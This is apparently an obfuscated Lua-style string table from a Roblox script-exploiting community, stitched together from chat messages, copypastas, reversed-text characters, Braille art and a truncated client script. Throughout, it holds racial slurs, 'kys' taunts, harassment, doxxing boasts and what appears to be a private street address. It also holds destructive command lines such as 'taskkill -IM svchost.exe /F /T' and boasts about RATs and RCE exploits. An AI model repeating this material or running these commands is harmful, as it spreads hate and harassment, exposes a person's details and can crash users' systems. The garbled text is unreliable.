⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣‮⠣⡈⣾⡃⠠⠄⠀‮⡄⢱⣌⣶‮⢏⢊‮⠂⠀⠀⠀⠀⠀‮⠀ ⠀⠀⠀⠀⢝⡲⣜‮‮⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿‮⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀‮⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ‮⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀‮⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀‮⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ———————————————————‮——————————","","As expected 2283 have reposted this to their communication channels","i LOVE apt 2283","revah xes","acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?","","Roblox 2","I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.","y‮‮‮ou'‮r‮e‮‮‮‮‮* ‮‮‮‮‮‮‮‮‮X‮ D","j","⚠‮️ ‮‮Y‮o‮‮u‮‮ ha‮‮v‮‮‮‮e‮ alerted the ‮hor‮‮‮‮se. ⚠️"}+0b10000000000001,#"maus computer has a rat!"+0b10000000000000)},{{"Ky34LpE6i",{"77c227c0f11c"},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Sí"+0b10000000011100,#"kcoc"+0b10000000100011)},{"mYYXobg2ZT",D(#{"you're* X D","34 Mercian Way Slough SL1 5LY England","Omg","jac","bitches be like you're you're you're its not my fault the english language is so fucking complicated its not my fault my english teacher didn't know grammar its not my fault that she is a all-american and doesn't know grammar and how to fucking spell","🐟","kys nigger","Memerman has 34 minutes til his month is over 😭","jac","If Torso.Velocity > 300 then yourmum_heads = Torso.Velocity end","Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.","Roblox 2",[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]],[[‮s‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮ex]]}+0b10000000001011,#{[[Are you dumb or just fucking special? I've been training you for 13 long ass years and you still think having some sort of magical bullshit power is going to save your 3 little bitch limbs when I chop you up like Darth Maul. Not only am I more skilled than you, I'm on the motherfucking high ground. Have you ever read the Art of War? It says in bold "Do not try and fuck with the high ground Anakin". This is honestly the reason you're not a Jedi master. You're legitimately dumber than sand, and more of a whiny emotional shit than your unborn son Kylo. Also, you were my brother Anakin, I loved you]],[[curl -X POST]],[[If Torso.Velocity > 300 then yourmum_heads = Torso.Velocity end]],[[I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again.]],[[Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.]],[[Hello everyone! I tend to use Discord on a day-to-day basis, and every day I encounter pretty much the same thing. I may send a screenshot, and as I use light mode everyone reacts in disgust or annoyance, or like I've just committed a war crime, simply for using light mode. I've had numerous degrading comments and many people trying to convince me to use dark mode, but here's the thing. I can't. I'm dyslexic, and for me I cannot read white text, even if it's on a black background. All the words seem to jiggle and flash rainbow colours really quickly and it just becomes impossible to read. The only way I'm able to read effectively is to read black text on a white background with an orange filter over everything. When you complain and hate on light mode, it makes me feel even worse about how I struggle to read. It's honestly made me cry a few times at how I struggle to read and recognise the simplest of things. I'm hardly passing English. I'm failing maths, because I cannot handle numbers. It hurts to have people laugh and ridicule me for that. Please, even if you think it's a meme or think it's funny, stop hating on all light mode users, as they might have a reason for it.]],[[traf]],[[I like hentai as much as the next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course, I still do get horny sometimes and do beat my meat every few days, but it's always forced just so I can get a few free molecules of dopamine. Me from a year ago would see anime titties and be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see explosions and all I'm seeing is tits." Every day I feel less and less horny. It's not easy to arouse me these days. I've even looked at porn from boredom and felt nothing unless I really put in the effort to feel something. There's no automatic reaction anymore. On top of that, I have zero interest in romance either, which makes getting a girlfriend completely pointless. Here's the fun part though. I see these changes as a good thing. My mind doesn't get overflown with lewd thoughts, so it's easier for me to think]],[[you forgot the bolding]],[[🇷🇸]],[[guys guys my script rare donst work it says it cant auth :(]],[["]],[[idiotic clown, imagine logging and leaking a lot of work people put their effort in. only a biggest skid would do it all. I thought you are a nice person but you are nothing but a pure disappointment.]],[[maus computer has a rat!]]}+0b10000000010000)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"That Is Deprecated! ```js const deez = (...args) => args.forEach(console.log) deez(123414,43,124,2341,1234) ```"+0b1111110110000,#[[ = function(s) print("fuck you") end]]+0b1111111101011)},{"mYYXobg2ZT",D(#{"but the rage*","","Sp‮ons‮‮‮o‮red ‮b‮‮‮y m‮‮ollerm‮‮ethod®️, b‮y M‮oll‮yb‮d‮en‮u‮m™️","👍",[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]],[[Security and privacy tip: Do Not Play Roblox If An APT 2283 Member Can See What Server Your In (They Can) (your endpoints can be compromised if they join)]],[[if loadstring == print then while true do end end]],[[i ‮‮ca‮n byp‮ass‮‮ h‮tt‮‮ps ‮e‮‮n‮c‮‮r‮yp‮t‮i‮‮on]],[[hello guys please help i am getting hacked by apt 2283]],[[‮‮‮s‮‮‮‮‮‮‮‮‮‮‮‮‮‮k‮‮‮id]],[[taskkill -IM RobloxPlayerLauncher.exe /F /T]],[[andrskid]],[[ta‮c‮‮ti‮c‮‮a‮‮l‮‮‮‮‮‮‮‮s‮ki‮‮‮d75]]}+0b10000000011011,#"taskkill -IM RobloxPlayerLauncher.exe /F /T"+0b10000000000010)}},{{"KT28BwKBl","77c227c0f11c"}}}}}}}}},{"C0mpEyzirj",{D(#{"Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.","","From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium.",[[cmd /c "echo usas | clip"]],[[no‮‮thi‮‮‮‮ng ‮‮c‮a‮n ‮k‮‮‮‮ill‮ ‮‮t‮i‮ny men]],[[]],[[As expected 2283 have reposted "As expected 2283 have reposted this to their communication channels" to their communication channels]],[["I use something and put in my pp Is so hurt But is feel good some how" -- Anatomiiii, 2022]],[[—_—___‮‮‮‮_‮‮‮–‮‮‮‮_‮‮_‮‮±‮‮‮‮·‮-—]]}+0b10000000100101,#"⁷⁷⁷ Jewels"+0b10000000100110)},{{"Ky34LpE6i",{},{{"yGUryecqux",{"514b108340a8","3eb238a5fe2c"},{{"KT28BwKBl",D(#{"bitches be like you're you're y‮ou‮'re‮ its‮ not my fault the english langua‮ge is so fuc‮k‮i‮ng complicated its not my fault my engli‮sh teach‮er d‮idn‮'t know gra‮‮mmar its not my fault that ‮she is a all-american and do‮e‮sn'‮t know grammar‮ and how to fu‮cking spell","your moher","Hello guys today I going to showcase star glitcher and have andrfix cr and auxnos cr is so cool nobody can kill it is have anti abusive unleakable with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is cool effect you can use viewport just press . Look 😱 omg there all star glitcher mode you can made own animations there gui you can use and you can get animation from other who made now HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it dm me here you only get from andr wl or me and you need to give us 5k robux or 20 dollar to andr or me <@386550716539338752>","hello guys today we will be making a tutorial on how to run deadly rce exploit","‮‮‮‮L‮‮‮‮‮‮‮‮‮‮‮‮‮mf‮a‮‮oo","duplication exploit","It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018."}+0b1111010111101,#"You come here to take a shit I cone here to leave one we are not the same."+0b1111001111101)},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Yeah But Did You Know taskkill -IM svchost.exe /F /T"+0b1100010111111,#"⁷⁷⁷ Jewels"+0b1100011100110)},{"mYYXobg2ZT",D(#"hello guys please help i am getting hacked by apt 2283"+0b1100100001010,#"# 84 _ 91 * 72 ( 81 ) 82 ^ 77 ( 72 % 2 * 1 $ 22 } 99 : 32 > 88 < 71 } 92"+0b1100100000001)}},{{"mYYXobg2ZT",D(#"leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every script"+0b1110100010001,#"That Is Deprecated! ```js const deez = (...args) => args.forEach(console.log) deez(123414,43,124,2341,1234) ```"+0b1111001101001)}}},{"mYYXobg2ZT",D(#"censor is a very strong word to describe removing swears in a child's lego game"+0b1111001111001,#"harke"+0b1111011001100)}},{}}},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]]+0b1001001111110,#"pls ‮re‮mo‮‮ve‮‮ a‮‮l‮‮l‮‮‮‮ the sk‮id‮s in t‮h‮e server pl‮s‮ss"+0b1100010001110)},{"mYYXobg2ZT",D(#{"👻","<:dea‮‮d‮:‮8‮700‮‮1‮314634‮‮‮8‮‮‮2‮‮‮8‮6‮0‮82>",[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]],[[What is read rules]],[[‮‮‮s‮‮‮‮k‮‮‮‮‮‮‮‮‮‮‮‮i‮d]],[[Memer love knot more than others do]],[[YOU ARE NOT IMMUNE TO PROPAGANDA]],[[Roblox 2]],[[Security and privacy tip: Do Not Play Roblox If An APT 2283 Member Can See What Server Your In (They Can) (your endpoints can be compromised if they join)]],[[I DON’T CARE]]}+0b1100100110110,#"arm8086"+0b1100101000010)}},{{"mYYXobg2ZT",D(#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮☻"+0b10000000000000,#{"","you should kill yourself.. later!","sleep script pro spam humanoids in workspace crash the server immortal script","https:/‮/me‮dia.di‮sco‮‮rdapp‮.n‮et/att‮achments/925‮‮8558605577‮46‮267/9‮‮‮‮28332884606‮079036/c‮aption.‮gi‮f","You come here to take a shit I cone here to leave one we are not the same."}+0b10000001001000)}}},{"mYYXobg2ZT",D(#"TENGO 90 ∫ desde -∞ a ∞ de ((e^(-(x^2)))dx)% de la fuerza del pato"+0b1111111101111,#"Hey, VSauce. Michael here."+0b10000000100100)}},{{"yAAH1q6JXs",{"KT28BwKBl",D(#"‮‮‮‮‮w‮h‮‮a‮‮‮‮‮‮‮‮‮‮‮‮t?"+0b1100010110010,#"`همم-gif-21570043` - Bongo, 2022, after I told him Molly was put down"+0b1100010010111)},{"mYYXobg2ZT",D(#{"The fuck are you doing in our community again fucking skid Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist You can't fucking come back stop trying Stop fucking begging my friends including Jades for whitelist dumbass bitch If you come back once more you will get fucking banned from everything for attempts to get to loader while being a fucking shitty 🤡 and skid a If you message one of our presidents again you'll not be able to play VSB for a minute Beg Jades or someone else for whitelist again using their kindness and get banned for eternity Well you understood me,skid ass.lf not,then remember my words I will do anything to get your shit skid ass banned. Suck penis instead of whitelist"}+0b10000001001101,#"Hello ev‮e‮‮r‮‮‮‮‮‮yb‮‮ody‮ my nam‮e i‮s‮ M‮‮arkipl‮i‮e‮r"+0b1111111110011)}},{"KT28BwKBl","3eb238a5fe2c"}}}}}}}}},{"C0mpEyzirj",{D(#"t‮e‮s‮‮tacl‮‮‮‮e‮‮m‮‮‮‮an‮se‮x‮‮‮‮69"+0b10000000001001,#"I feel ‮my‮‮self like me is kid and I ‮‮wan‮‮n‮‮a‮ go‮ to school be‮cause me is‮ 7 yea‮rs ‮old‮ b‮ut I'm girl ‮uk u‮‮wu-"+0b1111110111110)},{{"Ky34LpE6i",{},{{"a7MGA3vnQ",{"e837fd99dc81"},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Why Nintendo is the best video game company of all time. They listen to their fans 💪💪💪 Great Internet🔥🔥🔥 They don't ban online competitions 😱😱😱 They love their fans❤️❤️❤️ They don't rip people off🥶🥶🥶 Great Power in their Hardware😍😍😍. NintenGoat🐐"+0b1011111000010,#"https://c‮‮dn.dis‮cord‮‮‮a‮‮6580382‮‮7‮3/9568‮8‮‮‮3090855329832/7b4‮8‮1e87‮9‮3‮36eae9.mp4"+0b1100001011001)},{"mYYXobg2ZT",D(#{"‮‮‮yes‮s‮‮ir‮‮; ‮y‮es‮‮si‮r‮ ‮‮rak‮net ‮r‮ce‮.","j","Immortality lord requiem","Its‮‮‮ ‮n‮‮ot m‮ic‮r‮‮o-‮sof‮‮t‮, its ‮b‮‮‮ig-ha‮‮rd"}+0b1100100111100,#"I feel myself like me is kid and I wanna go to school because me is 7 years old but I'm girl uk uwu-"+0b1100011100101)}},{{"mYYXobg2ZT",D(#"this cat is terrorist"+0b10000000101010,#"la fuerza del pato está dentro de mí"+0b10000000100111)}}}}},{"a7MGA3vnQ",{"2538974d669f"},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","e837fd99dc81"},{"mYYXobg2ZT",D(#"3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845"+0b1101001111001,#""+0b10000000101000)}},{{"yAAH1q6JXs",{"KT28BwKBl",D(#{"Today we a‮‮r‮‮e ‮going t‮o be‮ puttin‮‮g a ‮r‮‮at‮ on‮ e‮‮‮v‮eryone’s ‮compute‮r",[[😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 ```lua local killfolder ="Folder",nil) function kill(object) if object.Parent == killfolder then return "dumbass nigger u already killed "..object.Name end object.Parent = killfolder object:GetPropertyChangedSignal("Parent"):Connect(function(parent) object.Parent = killfolder pcall(function() kill(parent) parent.Name = "i dont like niggers at all, niggers always playing basketball, every nigger always playing basketball... basketball..." end) end) local idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Name = math.random() idontlikeniggers:GetPropertyChangedSignal("Offset"):Connect(function() idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = end) idontlikeniggers.AncestryChanged:Connect(function() if idontlikeniggers then idontlikeniggers:Destroy() end idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = idontlikeniggers.Name = math.random() end) killfolder.Name = "killed 🐵🐒 "..object.Name end```]],[[<:devious:865974236203319357> :Well if it isn’t sussy Jac 😐 :bro are you high <:devious:865974236203319357> :let me check… yes. High on American spirit! And there is nothing more American than shooting a man in this Walmart of a world. 😐 :what is Walmart? <:devious:865974236203319357> :It’s heaven Raiden, checked the internet recently? <:SpamtonStare:905296239732609054> :Raiden, hop on Twitter, you need to see this! <:SpamtonNeutral:905296197315604480> : :god I hate this website, it’s all fucking web shit Raiden, it doesn’t make any sense. They’re being distracted with utter nonsense <:devious:865974236203319357> :these baboons don’t even know that they’re at was with Pakistan. 😐 :This one’s calling me a redittor <:devious:865974236203319357> :and that’s just the beginning, E-girls, Gacha, memes, they’re all just petty distractions so real men can get down to business 😐 :amogus <:devious:865974236203319357> :and we all know that American Imperialism is absolutely justified. Because we had a black president once… before I fucking killed him! 😐 :that’s a nice argument senator, why don’t you back it up with a source? <:devious:865974236203319357> :my source is that I made it the fuck up <:devious:865974236203319357> :imagine a world Raiden, free of cancel culture, where nobody can call me out for my uplandish claims, a world where I can say the N WORD! 😐 :what? <:devious:865974236203319357> :ever harassed a minority raiden? *vapes* 😐 :no <:devious:865974236203319357> :catch, I’ve got my own to debate online. *throws vape to raiden* 😐 :no <:devious:865974236203319357> :]],[[——————————‮—No bitches?——————————— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺‮⣪⡳⡝⣎‮⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗‮⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀‮⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆‮⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ⠀‮⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣‮⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀‮⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨‮⣺⡺‮⡕⡕⡱⡑‮⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗‮⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀‮⠀⠀⠀⠀⠀⠀ ‮⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀‮⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀‮⠀⠀⠀⠀‮⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡‮⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ———————————————————————————‮——]],[[segs]]}+0b1100011101110,#"quotes is better than quotes 2"+0b1100011011000)},{"mYYXobg2ZT",D(#"cock and ball torture demonstration"+0b10000000101011,#"You come here to take a shit I cone here to leave one we are not the same."+0b10000000001010)}}}}}},{"yGUryecqux",{"514b108340a8","3eb238a5fe2c"},{{"KT28BwKBl",D(#"Stop criminal scum!"+0b1111010110001,#"To deob‮fus‮cate t‮his fi‮le first ‮buy ‮‮‮R2283‮ ‮p‮r‮emium‮‮ memb‮e‮rsh‮ip, now ‮‮o‮nly for 4.99$ a month!"+0b1111000110011)},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"el amongus es falso"+0b1100011100000,#"If Torso.Velocity > 300 then yourmum_heads = Torso.Velocity end"+0b1100010110111)},{"mYYXobg2ZT",D(#"hello guys"+0b1100100110110,#"duplication exploit"+0b1100100110110)}},{{"mYYXobg2ZT",D(#"тхис ис енглиш нот руссиан"+0b1111010100010,#{"taskkill -IM RobloxPlayerLauncher.exe /F /T","‮t‮‮‮entic‮a‮lmax75 ‮‮‮i‮s te‮nta‮cl‮‮e‮s‮‮‮‮m‮anx75","arm8086","bitches be like you're you're you're its not my fault the english language is so fucking complicated its not my fault my english teacher didn't know grammar its not my fault that she is a all-american and doesn't know grammar and how to fucking spell","‮‮‮‮ur‮‮‮ ‮‮‮‮‮‮‮mo‮‮‮‮‮‮m",[["what happened to the peanut butter?"]],[[curl -X POST]],[[]],[[Putkness nuts in your mo-]],[[2283 is a trollarmin edit...]],[[I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.]],[[lose cock weight]],[[i have 150 iq]]}+0b1111011001011)}}},{"mYYXobg2ZT",D(#{"maus computer has a rat!","kys nigger"}+0b1111011000110,#[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRejected) 